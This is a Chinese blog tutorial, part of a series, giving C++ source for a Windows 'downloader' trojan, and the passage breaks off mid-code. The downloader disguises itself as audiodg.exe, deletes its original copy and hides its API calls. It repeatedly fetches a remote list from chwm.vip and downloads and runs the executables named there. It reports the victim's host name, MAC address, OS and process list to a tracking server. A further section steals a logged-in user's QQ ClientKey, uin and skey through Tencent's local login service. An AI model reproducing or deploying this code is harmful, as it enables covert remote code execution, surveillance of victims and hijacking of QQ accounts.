打造一款智能下载者 Downloader(劫持QQ Key篇)

2024-03-05 14:20
文章标签 打造 智能 qq key 一款 劫持 downloader 下载者

本文主要是介绍打造一款智能下载者 Downloader(劫持QQ Key篇),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

接着上一篇文章 :

​​​​​​打造一款智能下载者 Downloader(基础篇) 

本次我们主要继续完善下载者的功能,将添加劫持QQ Key(QQ Clientkey)模块。

鉴于之前已经开篇研究过截取QQ Key(QQ Clientkey)的流程,那么直接将代码复制粘贴即可。

原文:

最新利用腾讯快捷登录协议截取QQ ClientKey实战课程【详细教学-源码共享】

相关链接:

第三课:打造一款智能下载者 Downloader(统计系统安装篇)

Downloader v1.1 版 代码 —— 2023.09.23

// downloader.cpp : 定义控制台应用程序的入口点。
//#include "stdafx.h"
#include "downloader.h"#ifdef _DEBUG
#define new DEBUG_NEW
#endif#pragma comment( linker, "/subsystem:windows /entry:mainCRTStartup" ) typedef BOOL(_stdcall *XXXCY)(LPCTSTR, LPCTSTR, BOOL);
typedef HINSTANCE(_stdcall *XXXCute)(HWND, LPCTSTR, LPCTSTR, LPCTSTR, LPCTSTR, int);
typedef HRESULT(_stdcall *XXXDL)(LPUNKNOWN, LPCSTR, LPCSTR, DWORD, LPBINDSTATUSCALLBACK);
typedef HINTERNET(_stdcall *XXXInternetOpen)(LPCTSTR, DWORD, LPCTSTR, LPCTSTR, DWORD);
typedef HINTERNET(_stdcall *XXXInternetOpenUrl)(HINTERNET, LPCTSTR, LPCTSTR, DWORD, DWORD, DWORD);BOOL DelSlef();
BOOL DelTempFiles();
BOOL GetProcessName(LPCTSTR szProcess);
CString GetAllProcessNames();BOOL SendDataToCount();
BOOL PostDataToCount(TCHAR *szPostURL, TCHAR *szState1, TCHAR *szState2, TCHAR *szState3);void GetWinOS();
BOOL IsWow64OSEx();
CString GetMacAddress(void);TCHAR szLBFile[MAX_PATH] = "https://www.chwm.vip/load.swf";		// 远程列表文件地址
TCHAR szCountUrl[MAX_PATH] = "https://www.chwm.vip/Count.php";	// 程序统计接口地址
TCHAR szVersion[MAX_PATH] = "1.1";								// 程序版本号
TCHAR szUserID[MAX_PATH] = "admin";								// 客户编号TCHAR szLBSaveFile[MAX_PATH] = { 0 };							// 列表文件本地保存地址
TCHAR szEXESaveFile[MAX_PATH] = { 0 };							// 下载的程序保存路径
TCHAR szSelfFilePath[MAX_PATH] = { 0 };							// 程序自身路径
TCHAR szSelfSaveFile[MAX_PATH] = { 0 };							// 程序自身释放路径TCHAR osx[MAX_PATH] = { 0 };									// 系统版本存放变量TCHAR CGLB[10240] = { 0 };										// 分配 10M 内存来保存成功下载的地址BOOL TJ = FALSE;
BOOL ReStart = FALSE;// 唯一的应用程序对象CWinApp theApp;using namespace std;int main(int argc, char *argv[])
{CString Encryption_Point = "****** 2023.09.23 ******";for (int i = 0; i < argc; i++){if (strstr(argv[i], "ReStart")){ReStart = TRUE;}}///// 获取程序自身路径GetModuleFileName(NULL, szSelfFilePath, MAX_PATH);///// 获取系统相关配置目录路径// CSIDL_LOCAL_APPDATA// FOLDERID_LocalAppData// 版本 5.0。 用作本地(非roaming) 应用程序的数据存储库的文件系统目录。 // 典型路径为 C:\Documents and Settings\username\Local Settings\Application DataSHGetSpecialFolderPath(NULL, szLBSaveFile, CSIDL_LOCAL_APPDATA, TRUE);SHGetSpecialFolderPath(NULL, szEXESaveFile, CSIDL_LOCAL_APPDATA, TRUE); SHGetSpecialFolderPath(NULL, szSelfSaveFile, CSIDL_LOCAL_APPDATA, TRUE);lstrcat(szLBSaveFile, "\\Temp\\Load.tmp");lstrcat(szEXESaveFile, "\\Temp");lstrcat(szSelfSaveFile, "\\Temp\\audiodg.exe");if ( !ReStart ){///// 获取目标文件或文件夹属性DWORD dwFileAttr = GetFileAttributes(szSelfSaveFile);// 判断属性是否为空if (dwFileAttr == INVALID_FILE_ATTRIBUTES){//复制自身XXXCY cy;HMODULE hkernel;hkernel = LoadLibrary(_T("kernel32.dll"));cy = (XXXCY)GetProcAddress(hkernel, "CopyFileA");if (cy != NULL){cy(szSelfFilePath, szSelfSaveFile, FALSE);}cy = NULL;FreeLibrary(hkernel);Sleep(500);lstrcat(szSelfSaveFile, " ReStart");WinExec(szSelfSaveFile, SW_SHOW);DelSlef();exit(0);}else{CString szSelfRandomName = NULL;CString szRand1 = NULL, szRand2 = NULL;// 生成16位随机名称time_t seed = time(NULL);srand((unsigned)seed);for (int j = 0; j < 16; j++){switch ((rand() % 2)){case 1:szRand1.Format("%C", rand() % 10 + 48);break;default:szRand1.Format("%C", rand() % 6 + 65);}szRand2 += szRand1;Sleep(100);}szSelfRandomName.Format(TEXT("\\%s.EXE"), szRand2);TCHAR *szSelfRandomNames = szSelfRandomName.GetBuffer(szSelfRandomName.GetLength() + 1);szSelfRandomName.ReleaseBuffer();lstrcpy(szSelfSaveFile, szEXESaveFile);lstrcat(szSelfSaveFile, szSelfRandomNames);//复制自身XXXCY cy;HMODULE hkernel;hkernel = LoadLibrary(_T("kernel32.dll"));cy = (XXXCY)GetProcAddress(hkernel, "CopyFileA");if (cy != NULL){cy(szSelfFilePath, szSelfSaveFile, FALSE);}cy = NULL;FreeLibrary(hkernel);Sleep(500);lstrcat(szSelfSaveFile, " ReStart");WinExec(szSelfSaveFile, SW_SHOW);DelSlef();exit(0);}}/////			 创建互斥 防止多次运行			 /////SetLastError(0);HANDLE g_hMutex = ::CreateMutex(NULL, FALSE, szUserID);if (GetLastError() == ERROR_ALREADY_EXISTS){exit(0);}///// 开始循环工作do{// 清理缓存DelTempFiles();XXXDL kkkkkkk;HMODULE hurlmon;hurlmon = LoadLibrary(_T("urlmon.dll"));kkkkkkk = (XXXDL)GetProcAddress(hurlmon, "URLDownloadToFileA");if (kkkkkkk != NULL){HRESULT hRes = kkkkkkk(NULL, szLBFile, szLBSaveFile, 0, NULL);}kkkkkkk = NULL;FreeLibrary(hurlmon);Sleep(500);CString myText = NULL;TCHAR Buffer[MAX_PATH] = { 0 };FILE *TK = fopen(szLBSaveFile, "r+");while (fgets(Buffer, sizeof(Buffer), TK) != NULL){myText.Format("%s", Buffer);//AfxMessageBox(myText);CString szProcess = NULL, szURL = NULL;// 标记出找到的第一个逗号在myText中的以0为初始索引的序号。// 找不到返回-1值int pos = myText.Find("|");if (pos >= 0){// 目标进程// 把左边的第一段放到szProcess中szProcess.Format("%s", myText.Left(pos));//AfxMessageBox(szProcess);// 下载地址// 把除第一段剩下的放到szURL中szURL.Format("%s", myText.Mid(pos + 1));//AfxMessageBox(szURL);TCHAR *TargetURL = szURL.GetBuffer(szURL.GetLength() + 1);szURL.ReleaseBuffer();// 判断成功列表里是否存在该下载地址if ( !strstr(CGLB, TargetURL) ){// 判断系统是否存在指定进程if ( GetProcessName(szProcess) ){CString myEXESaveFile = NULL;CString szRand1 = NULL, szRand2 = NULL;// 生成16位随机名称time_t seed = time(NULL);srand((unsigned)seed);for (int j = 0; j < 16; j++){switch ((rand() % 2)){case 1:szRand1.Format("%C", rand() % 10 + 48);break;default:szRand1.Format("%C", rand() % 6 + 65);}szRand2 += szRand1;Sleep(100);}myEXESaveFile.Format(TEXT("%s\\%s.EXE"), szEXESaveFile, szRand2);//AfxMessageBox(myEXESaveFile);hurlmon = LoadLibrary(_T("urlmon.dll"));kkkkkkk = (XXXDL)GetProcAddress(hurlmon, "URLDownloadToFileA");if (kkkkkkk != NULL){HRESULT hRes = kkkkkkk(NULL, szURL, myEXESaveFile, 0, NULL);if (hRes == S_OK){HMODULE hshell;hshell = LoadLibrary(_T("shell32.dll"));XXXCute cute;cute = (XXXCute)GetProcAddress(hshell, "ShellExecuteA");if (cute != NULL){HINSTANCE hNewExe = cute(NULL, "open", myEXESaveFile, NULL, NULL, SW_SHOW);if ((DWORD)hNewExe > 32){// 成功下载并运行后// 保存地址在成功列表// 防止程序重复下载lstrcat(CGLB, TargetURL);}}cute = NULL;FreeLibrary(hshell);}}kkkkkkk = NULL;FreeLibrary(hurlmon);}}}}fclose(TK);DeleteFile(szLBSaveFile);if ( !TJ ){// 统计数据if ( SendDataToCount() ){TJ = TRUE;}// 刷新系统缓存SHChangeNotify(SHCNE_ASSOCCHANGED, SHCNF_FLUSHNOWAIT, NULL, NULL);}// 延时一分钟Sleep(60000);} while (1);return 0;
}BOOL DelSlef()
{SHELLEXECUTEINFO sei;TCHAR szModule[MAX_PATH], szComspec[MAX_PATH], szParams[MAX_PATH];// Get its own file name Get the full path file name of CMDif ((GetModuleFileName(0, szModule, MAX_PATH) != 0) &&(GetShortPathName(szModule, szModule, MAX_PATH) != 0) &&(GetEnvironmentVariable("COMSPEC", szComspec, MAX_PATH) != 0)) {lstrcpy(szParams, "/c del ");lstrcat(szParams, "\"");lstrcat(szParams, szModule);lstrcat(szParams, "\"");lstrcat(szParams, " > nul");sei.cbSize = sizeof(sei);sei.hwnd = 0;sei.lpVerb = "Open";sei.lpFile = szComspec;sei.lpParameters = szParams;sei.lpDirectory = 0; sei.nShow = SW_HIDE;sei.fMask = SEE_MASK_NOCLOSEPROCESS;if (ShellExecuteEx(&sei)) {// Set the execution level of CMD process to idle executionSetPriorityClass(sei.hProcess, NORMAL_PRIORITY_CLASS);// Set the priority of its own process highSetPriorityClass(GetCurrentProcess(), REALTIME_PRIORITY_CLASS);SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL);// Notify the windows resource SHChangeNotify(SHCNE_DELETE, SHCNF_PATH, szModule, 0);return TRUE;}}return FALSE;
}BOOL DelTempFiles()
{ShellExecute(NULL, "open", "ipconfig.exe", " /flushdns", NULL, SW_HIDE);BOOL bResult = FALSE;BOOL bDone = FALSE;LPINTERNET_CACHE_ENTRY_INFO lpCacheEntry = NULL;DWORD  dwTrySize, dwEntrySize = 4096; // start buffer sizeHANDLE hCacheDir = NULL;DWORD  dwError = ERROR_INSUFFICIENT_BUFFER;do{switch (dwError){// need a bigger buffercase ERROR_INSUFFICIENT_BUFFER:delete[] lpCacheEntry;lpCacheEntry = (LPINTERNET_CACHE_ENTRY_INFO) new char[dwEntrySize];lpCacheEntry->dwStructSize = dwEntrySize;dwTrySize = dwEntrySize;BOOL bSuccess;if (hCacheDir == NULL)bSuccess = (hCacheDir= FindFirstUrlCacheEntry(NULL, lpCacheEntry,&dwTrySize)) != NULL;elsebSuccess = FindNextUrlCacheEntry(hCacheDir, lpCacheEntry, &dwTrySize);if (bSuccess)dwError = ERROR_SUCCESS;else{dwError = GetLastError();dwEntrySize = dwTrySize; // use new size returned}break;// we are donecase ERROR_NO_MORE_ITEMS:bDone = TRUE;bResult = TRUE;break;// we have got an entrycase ERROR_SUCCESS:// don't delete cookie entryif (!(lpCacheEntry->CacheEntryType & COOKIE_CACHE_ENTRY))DeleteUrlCacheEntry(lpCacheEntry->lpszSourceUrlName);// get ready for next entrydwTrySize = dwEntrySize;if (FindNextUrlCacheEntry(hCacheDir, lpCacheEntry, &dwTrySize))dwError = ERROR_SUCCESS;else{dwError = GetLastError();dwEntrySize = dwTrySize; // use new size returned}break;// unknown errordefault:bDone = TRUE;break;}if (bDone){delete[]lpCacheEntry;if (hCacheDir)FindCloseUrlCache(hCacheDir);}} while (!bDone);return TRUE;
}BOOL GetProcessName(LPCTSTR szProcess)
{HANDLE hShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);PROCESSENTRY32 pe32x = { sizeof(PROCESSENTRY32),0 };if (Process32First(hShot, &pe32x)){CString TargetName = NULL;TargetName.Format(TEXT("%s"), szProcess);TargetName.MakeLower();do {CString ProcessName = NULL;ProcessName.Format("%s", pe32x.szExeFile);ProcessName.MakeLower();if (ProcessName == TargetName){CloseHandle(hShot);return TRUE;}} while (Process32Next(hShot, &pe32x));}CloseHandle(hShot);return FALSE;
}CString GetAllProcessNames()
{CString AllProcessNames = "";HANDLE hShot2 = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);PROCESSENTRY32 pe32 = { sizeof(PROCESSENTRY32),0 };if (Process32First(hShot2, &pe32)){do {CString GetProcessName = "";GetProcessName.Format(TEXT("%s"), pe32.szExeFile);AllProcessNames += GetProcessName;AllProcessNames += "|";} while (Process32Next(hShot2, &pe32));}CloseHandle(hShot2);return AllProcessNames;
}BOOL SendDataToCount()
{TCHAR dat[10240] = { 0 };TCHAR jsj[MAX_PATH] = { 0 };WSADATA _wsaData = { 0 };ZeroMemory(dat, 10240 * sizeof(TCHAR));ZeroMemory(jsj, MAX_PATH * sizeof(TCHAR));int _Result = 0;_Result = WSAStartup(MAKEWORD(2, 2), &_wsaData);if (_Result == SOCKET_ERROR){lstrcat(jsj, "unkonw1");}_Result = gethostname(jsj, sizeof(jsj));if (_Result == SOCKET_ERROR){lstrcat(jsj, "unkonw2");}WSACleanup();GetWinOS();CString szMac = NULL;szMac = GetMacAddress();TCHAR *MAC = szMac.GetBuffer(szMac.GetLength() + 1);szMac.ReleaseBuffer();CString szProcess = NULL;szProcess = GetAllProcessNames();TCHAR *PROCESS = szProcess.GetBuffer(szProcess.GetLength() + 1);szProcess.ReleaseBuffer();// 构建统计数据lstrcpy(dat, szCountUrl);lstrcat(dat, "?jc=");lstrcat(dat, PROCESS);lstrcat(dat, "&ver=");lstrcat(dat, szVersion);lstrcat(dat, "&ID=");lstrcat(dat, szUserID);lstrcat(dat, "&MN=");lstrcat(dat, jsj);lstrcat(dat, "&os=");lstrcat(dat, osx);lstrcat(dat, "&mac=");lstrcat(dat, MAC);HMODULE hshell;hshell = LoadLibrary(_T("wininet.dll"));HINSTANCE(WINAPI *XXXInternetOpen)(LPCTSTR, DWORD, LPCTSTR, LPCTSTR, DWORD);HINSTANCE(WINAPI *XXXInternetOpenUrl)(HINTERNET, LPCTSTR, LPCTSTR, DWORD, DWORD, DWORD);HINSTANCE(WINAPI *XXXInternetCloseHandle)(HINTERNET);(FARPROC&)XXXInternetOpen = GetProcAddress(hshell, "InternetOpenA");(FARPROC&)XXXInternetOpenUrl = GetProcAddress(hshell, "InternetOpenUrlA");(FARPROC&)XXXInternetCloseHandle = GetProcAddress(hshell, "InternetCloseHandle");HINTERNET hropen = XXXInternetOpen(NULL, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, NULL);if (hropen != NULL){HINTERNET hropenurl = XXXInternetOpenUrl(hropen, dat, NULL, NULL, INTERNET_FLAG_NO_CACHE_WRITE, NULL);if (hropenurl != NULL){TCHAR buffer[MAX_PATH] = { 0 };ZeroMemory(buffer, MAX_PATH * sizeof(TCHAR));DWORD dwBytesRead = 0;BOOL ret = ::InternetReadFile(hropenurl, buffer, sizeof(buffer), &dwBytesRead);if (ret){XXXInternetCloseHandle(hropenurl);XXXInternetCloseHandle(hropen);FreeLibrary(hshell);char *myMSG1;myMSG1 = strstr(buffer, "Fail");char *myMSG2;myMSG2 = strstr(buffer, "Success");char *myMSG3;myMSG3 = strstr(buffer, "Repeat");if (myMSG1 || myMSG2 || myMSG3){return TRUE;}else{// 由于提取的数据过长会导致统计失败// 这里省去 szProcess 重新统计TCHAR postData[1024] = { 0 };ZeroMemory(postData, 1024 * sizeof(TCHAR));lstrcpy(postData, szCountUrl);lstrcat(postData, "?ver=");lstrcat(postData, szVersion);lstrcat(postData, "&ID=");lstrcat(postData, szUserID);lstrcat(postData, "&CP=");lstrcat(postData, jsj);lstrcat(postData, "&os=");lstrcat(postData, osx);lstrcat(postData, "&mac=");lstrcat(postData, MAC);if ( PostDataToCount(postData, "Success", "Fail", "Repeat") ){return TRUE;}else{return FALSE;}}}}XXXInternetCloseHandle(hropenurl);}XXXInternetCloseHandle(hropen);FreeLibrary(hshell);return FALSE;
}BOOL PostDataToCount(TCHAR *szPostURL, TCHAR *szState1, TCHAR *szState2, TCHAR *szState3)
{HMODULE hshell;hshell = LoadLibrary(_T("wininet.dll"));HINSTANCE(WINAPI *XXXInternetOpen)(LPCTSTR, DWORD, LPCTSTR, LPCTSTR, DWORD);HINSTANCE(WINAPI *XXXInternetOpenUrl)(HINTERNET, LPCTSTR, LPCTSTR, DWORD, DWORD, DWORD);HINSTANCE(WINAPI *XXXInternetCloseHandle)(HINTERNET);(FARPROC&)XXXInternetOpen = GetProcAddress(hshell, "InternetOpenA");(FARPROC&)XXXInternetOpenUrl = GetProcAddress(hshell, "InternetOpenUrlA");(FARPROC&)XXXInternetCloseHandle = GetProcAddress(hshell, "InternetCloseHandle");HINTERNET hropen = XXXInternetOpen(NULL, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, NULL);if (hropen != NULL){HINTERNET hropenurl = XXXInternetOpenUrl(hropen, szPostURL, NULL, NULL, INTERNET_FLAG_NO_CACHE_WRITE, NULL);if (hropenurl != NULL){TCHAR buffer[MAX_PATH] = { 0 };ZeroMemory(buffer, MAX_PATH * sizeof(TCHAR));DWORD dwBytesRead = 0;BOOL ret = ::InternetReadFile(hropenurl, buffer, sizeof(buffer), &dwBytesRead);if (ret){TCHAR *myMSG1;myMSG1 = strstr(buffer, szState1);TCHAR *myMSG2;myMSG2 = strstr(buffer, szState2);TCHAR *myMSG3;myMSG3 = strstr(buffer, szState3);if (myMSG1 || myMSG2 || myMSG3){XXXInternetCloseHandle(hropenurl);XXXInternetCloseHandle(hropen);FreeLibrary(hshell);return TRUE;}}}XXXInternetCloseHandle(hropenurl);}XXXInternetCloseHandle(hropen);FreeLibrary(hshell);return FALSE;
}void GetWinOS()
{HKEY   hKEY;LPCTSTR   data_Set = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion";long   ret0 = (RegOpenKeyEx(HKEY_LOCAL_MACHINE, data_Set, 0, KEY_WOW64_64KEY | KEY_READ, &hKEY));if (ret0 == ERROR_SUCCESS){LPBYTE owner_Get1 = new BYTE[80];DWORD type_1 = REG_SZ;DWORD cbData_1 = 80;ZeroMemory(osx, MAX_PATH * sizeof(TCHAR));long   ret1 = ::RegQueryValueEx(hKEY, "ProductName", NULL, &type_1, owner_Get1, &cbData_1);if (ret1 == ERROR_SUCCESS){char *OSVersion = (char *)owner_Get1;lstrcpy(osx, OSVersion);}else{lstrcpy(osx, "Unknow System");}}RegCloseKey(hKEY);// 判断是否 64 位系统if (IsWow64OSEx()){lstrcat(osx, " x64");}else{lstrcat(osx, " x86");}
}BOOL IsWow64OSEx()
{typedef BOOL(WINAPI *LPFN_ISWOW64PROCESS) (HANDLE, PBOOL);LPFN_ISWOW64PROCESS fnIsWow64Process;BOOL bIsWow64 = FALSE;fnIsWow64Process = (LPFN_ISWOW64PROCESS)GetProcAddress(GetModuleHandle("kernel32"), "IsWow64Process");if (NULL != fnIsWow64Process){fnIsWow64Process(GetCurrentProcess(), &bIsWow64);}return bIsWow64;
}typedef struct _ASTAT_
{ADAPTER_STATUS adapt;NAME_BUFFER    NameBuff[30];
}ASTAT, *PASTAT;UCHAR GetAddressByIndex(int lana_num, ASTAT & Adapter)
{UCHAR uRetCode;NCB ncb;memset(&ncb, 0, sizeof(ncb));ncb.ncb_command = NCBRESET;ncb.ncb_lana_num = lana_num;uRetCode = Netbios(&ncb);memset(&ncb, 0, sizeof(ncb));ncb.ncb_command = NCBASTAT;ncb.ncb_lana_num = lana_num;lstrcpy((char *)ncb.ncb_callname, "*      ");ncb.ncb_buffer = (unsigned char *)&Adapter;ncb.ncb_length = sizeof(Adapter);uRetCode = Netbios(&ncb);return uRetCode;
}CString GetMacAddress(void)
{CString strMacAddress;NCB ncb;UCHAR uRetCode;int num = 0;LANA_ENUM lana_enum;memset(&ncb, 0, sizeof(ncb));ncb.ncb_command = NCBENUM;ncb.ncb_buffer = (unsigned char *)&lana_enum;ncb.ncb_length = sizeof(lana_enum);uRetCode = Netbios(&ncb);if (uRetCode == 0){num = lana_enum.length;for (int i = 0; i < num; i++){ASTAT Adapter;if (GetAddressByIndex(lana_enum.lana[i], Adapter) == 0){strMacAddress.Format(_T("%02X%02X%02X%02X%02X%02X"),Adapter.adapt.adapter_address[0],Adapter.adapt.adapter_address[1],Adapter.adapt.adapter_address[2],Adapter.adapt.adapter_address[3],Adapter.adapt.adapter_address[4],Adapter.adapt.adapter_address[5]);}}}return strMacAddress;
}

截取QQ Key(QQ Clientkey)代码

首次会话(查找 pt_local_token 的值): 

        // 初始化URLURL_COMPONENTSA crackedURL = { 0 };char URL_STRING[] = "https://ssl.xui.ptlogin2.weiyun.com/cgi-bin/xlogin?appid=527020901&daid=372&low_login=0&qlogin_auto_login=1&s_url=https://www.weiyun.com/web/callback/common_qq_login_ok.html?login_succ&style=20&hide_title=1&target=self&link_target=blank&hide_close_icon=1&pt_no_auth=1";char szHostName[128] = { 0 };char szUrlPath[256] = { 0 };crackedURL.dwStructSize = sizeof(URL_COMPONENTSA);crackedURL.lpszHostName = szHostName;crackedURL.dwHostNameLength = ARRAYSIZE(szHostName);crackedURL.lpszUrlPath = szUrlPath;crackedURL.dwUrlPathLength = ARRAYSIZE(szUrlPath);InternetCrackUrlA(URL_STRING, (DWORD)strlen(URL_STRING), 0, &crackedURL);// 初始化会话HINTERNET hInternet = InternetOpenA("Microsoft Internet Explorer", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);if (hInternet != NULL){HINTERNET hHttpSession = InternetConnectA(hInternet, crackedURL.lpszHostName, INTERNET_DEFAULT_HTTPS_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);if (hHttpSession != NULL){HINTERNET hHttpRequest = HttpOpenRequestA(hHttpSession, "GET", crackedURL.lpszUrlPath, NULL, "", NULL, INTERNET_FLAG_SECURE, 0);if (hHttpRequest != NULL){BOOL bRet = FALSE;// 发送HTTP请求bRet = HttpSendRequest(hHttpRequest, NULL, 0, NULL, 0);if (bRet){// 查询HTTP请求状态DWORD dwRetCode = 0;DWORD dwSizeOfRq = sizeof(DWORD);bRet = HttpQueryInfo(hHttpRequest, HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER, &dwRetCode, &dwSizeOfRq, NULL);if (bRet){// 读取整个Headerschar lpHeaderBuffer[1024] = { 0 };dwSizeOfRq = 1024;HttpQueryInfo(hHttpRequest, HTTP_QUERY_RAW_HEADERS, lpHeaderBuffer, &dwSizeOfRq, NULL);// 提取 pt_local_token 的值char* pt_local_token = lpHeaderBuffer + dwSizeOfRq;while (pt_local_token != lpHeaderBuffer){if (strstr(pt_local_token, "pt_local_token=")){pt_local_token += sizeof("pt_local_token");char* pEndBuffer = strstr(pt_local_token, ";");*pEndBuffer = 0;break;}pt_local_token--;}// 关闭句柄InternetCloseHandle(hHttpRequest);InternetCloseHandle(hHttpSession);cout << "[+] pt_local_token:" << pt_local_token << "\r\n" << endl;}}}}}

 二次会话(获取本机已登录的 QQ uin):

    /* 二次会话 *///生成16位随机数time_t seed = time(NULL);srand((unsigned)seed);CString szRand1 = "", szRand2 = "";for (int j = 0; j < 16; j++){switch ((rand() % 2)){case 1:szRand1.Format("%C", rand() % 5 + 48);break;default:szRand1.Format("%C", rand() % 5 + 53);}szRand2 += szRand1;Sleep(50);}char *szRandNum = szRand2.GetBuffer(szRand2.GetLength() + 1);szRand2.ReleaseBuffer();// 初始化URL参数char lpszUrlPath[1024] = { 0 };strcat(lpszUrlPath, "/pt_get_uins?callback=ptui_getuins_CB&r=0.");strcat(lpszUrlPath, szRandNum);            // 追加16位随机数strcat(lpszUrlPath, "&pt_local_tk=");strcat(lpszUrlPath, pt_local_token);    // 追加pt_local_token// 建立会话hHttpSession = InternetConnectA(hInternet, "localhost.ptlogin2.weiyun.com", 4301, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);if (NULL != hHttpSession){hHttpRequest = HttpOpenRequestA(hHttpSession, "GET", lpszUrlPath, NULL, "", NULL, INTERNET_FLAG_SECURE, 0);if (NULL != hHttpRequest){// 发送HTTP请求,添加头信息char lpHeaders[] = "Referer:https://ssl.xui.ptlogin2.weiyun.com/";bRet = HttpSendRequestA(hHttpRequest, lpHeaders, strlen(lpHeaders), NULL, 0);if (bRet){// 查询HTTP请求状态dwRetCode = 0;dwSizeOfRq = sizeof(DWORD);bRet = HttpQueryInfo(hHttpRequest, HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER, &dwRetCode, &dwSizeOfRq, NULL);if (bRet){// 获取返回数据的大小DWORD dwNumberOfBytesAvailable = 0;bRet = InternetQueryDataAvailable(hHttpRequest, &dwNumberOfBytesAvailable, NULL, NULL);if (bRet){// 读取网页内容char* lpBuffer = new char[dwNumberOfBytesAvailable + 1]();bRet = InternetReadFile(hHttpRequest, lpBuffer, dwNumberOfBytesAvailable, &dwNumberOfBytesAvailable);if (bRet){// 提取 QQ uinchar* uin = lpBuffer + dwNumberOfBytesAvailable;while (uin != lpBuffer){if (strstr(uin, "\"uin\":")){uin += sizeof("\"uin\":") - 1;char* pEndBuffer = strstr(uin, "}");*pEndBuffer = 0;break;}uin--;}// 关闭句柄InternetCloseHandle(hHttpRequest);InternetCloseHandle(hHttpSession);cout << "[+] uin:" << uin << "\r\n" << endl;delete[] lpBuffer;}}}}}

 三次会话(截取 QQ ClientKey):

    /* 三次会话 */// 构造 URLZeroMemory(lpszUrlPath, 1024);strcat(lpszUrlPath, "/pt_get_st?clientuin=");strcat(lpszUrlPath, uin);strcat(lpszUrlPath, "&pt_local_tk=");strcat(lpszUrlPath, pt_local_token);// 发送HTTPS请求hHttpSession = InternetConnectA(hInternet, "localhost.ptlogin2.weiyun.com", 4301, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);if (NULL != hHttpSession){hHttpRequest = HttpOpenRequestA(hHttpSession, "GET", lpszUrlPath, NULL, "", NULL, INTERNET_FLAG_SECURE, 0);if (NULL != hHttpRequest){// 添加头信息char lpHeaders2[] = "Referer:https://ssl.xui.ptlogin2.weiyun.com/";bRet = HttpSendRequestA(hHttpRequest, lpHeaders2, strlen(lpHeaders2), NULL, 0);if (bRet){// 查询HTTP请求状态dwRetCode = 0;dwSizeOfRq = sizeof(DWORD);bRet = HttpQueryInfoA(hHttpRequest, HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER, &dwRetCode, &dwSizeOfRq, NULL);if (bRet){// 读取整个HeadersZeroMemory(lpHeaderBuffer, 1024);dwSizeOfRq = 1024;bRet = HttpQueryInfoA(hHttpRequest, HTTP_QUERY_RAW_HEADERS, lpHeaderBuffer, &dwSizeOfRq, NULL);if (bRet){// 提取 ClientKey 的值char* clientkey = lpHeaderBuffer + dwSizeOfRq;while (clientkey != lpHeaderBuffer){if (strstr(clientkey, "clientkey=")){clientkey += sizeof("clientkey");char* pEndBuffer = strstr(clientkey, ";");*pEndBuffer = 0;break;}clientkey--;}// 关闭句柄InternetCloseHandle(hHttpRequest);InternetCloseHandle(hHttpSession);cout << "[+] clientkey:" << clientkey << "\r\n" << endl;}}}}}

 四次会话(获取 Skey 并提取 ptsigx 的值):

    /* 四次会话 */// 构造 URLZeroMemory(lpszUrlPath, 1024);strcat(lpszUrlPath, "/jump?clientuin=");strcat(lpszUrlPath, uin);strcat(lpszUrlPath, "&clientkey=");strcat(lpszUrlPath, clientkey);strcat(lpszUrlPath, "&keyindex=9&u1=https://www.weiyun.com/web/callback/common_qq_login_ok.html?login_succ&pt_local_tk=&pt_3rd_aid=0&ptopt=1&style=40");// 发送HTTPS请求hHttpSession = InternetConnectA(hInternet, "ptlogin2.qq.com", INTERNET_DEFAULT_HTTPS_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);if (NULL != hHttpSession){hHttpRequest = HttpOpenRequestA(hHttpSession, "GET", lpszUrlPath, NULL, "", NULL, INTERNET_FLAG_SECURE, 0);if (NULL != hHttpRequest){// 添加Refererchar lpReferer[128] = { 0 };strcpy(lpReferer, "Referer: ");strcat(lpReferer, "https://ptlogin2.qq.com/");strcat(lpReferer, "\r\n");HttpAddRequestHeaders(hHttpRequest, lpReferer, -1L, HTTP_ADDREQ_FLAG_ADD);bRet = HttpSendRequestA(hHttpRequest, NULL, NULL, NULL, 0);if (bRet){// 查询HTTP请求状态dwRetCode = 0;dwSizeOfRq = sizeof(DWORD);bRet = HttpQueryInfoA(hHttpRequest, HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER, &dwRetCode, &dwSizeOfRq, NULL);if (bRet){// 获取返回数据的大小DWORD dwNumberOfBytesAvailablex = 0;InternetQueryDataAvailable(hHttpRequest, &dwNumberOfBytesAvailablex, NULL, NULL);// 读取返回的 Response 数据char* lpBufferx = new char[dwNumberOfBytesAvailablex + 1]();InternetReadFile(hHttpRequest, lpBufferx, dwNumberOfBytesAvailablex, &dwNumberOfBytesAvailablex);// 输出 Response 数据cout << "[+] Response Data:" << lpBufferx << "\r\n" << endl;// 从返回数据中提取 ptsigx 备用char* ptsigx = lpBufferx + dwNumberOfBytesAvailablex;while (ptsigx != lpBufferx){if (strstr(ptsigx, "check_sig?")){ptsigx += sizeof("check_sig");char* pEndBuffer = strstr(ptsigx, "'");*pEndBuffer = 0;break;}ptsigx--;}// 构造 ptsigx URLCString szPtsigx = "";szPtsigx.Format(TEXT("/check_sig?%s"), ptsigx);cout << "[+] szPtsigx:" << szPtsigx << "\r\n" << endl;delete[] lpBufferx;// 读取整个HeadersZeroMemory(lpHeaderBuffer, 1024);dwSizeOfRq = 1024;HttpQueryInfoA(hHttpRequest, HTTP_QUERY_RAW_HEADERS_CRLF, lpHeaderBuffer, &dwSizeOfRq, NULL);// 提取 skey 的值char* skey = lpHeaderBuffer + dwSizeOfRq;while (skey != lpHeaderBuffer){if (strstr(skey, "skey=")){skey += sizeof("skey");char* pEndBuffer = strstr(skey, ";");*pEndBuffer = 0;break;}skey--;}// 